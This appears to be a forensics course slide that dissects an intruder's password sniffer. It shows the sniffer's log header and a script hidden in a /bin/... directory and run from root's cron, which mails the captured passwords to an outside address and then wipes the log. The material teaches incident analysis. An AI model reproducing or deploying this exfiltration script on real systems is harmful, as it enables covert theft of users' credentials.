Forensics 11. Anatomy of a password sniffer

Passwords (to appear in tcp.out) mailed periodically from one of root's cron jobs, using the slog script:

  bash# cat tcp.out
  filtering out smtp connections.
  Using logical device /dev/hme [/dev/hme]
  Output to stdout.

  Log started at => Sat May  1 05:40:43 [pid 18357]

  Log ended at => Sat May  1 05:42:38

  bash# cat slog
  #!/bin/.../ksh
  cat /bin/.../tcp.out | mail foo@bar.com
  echo " " >/bin/.../tcp.out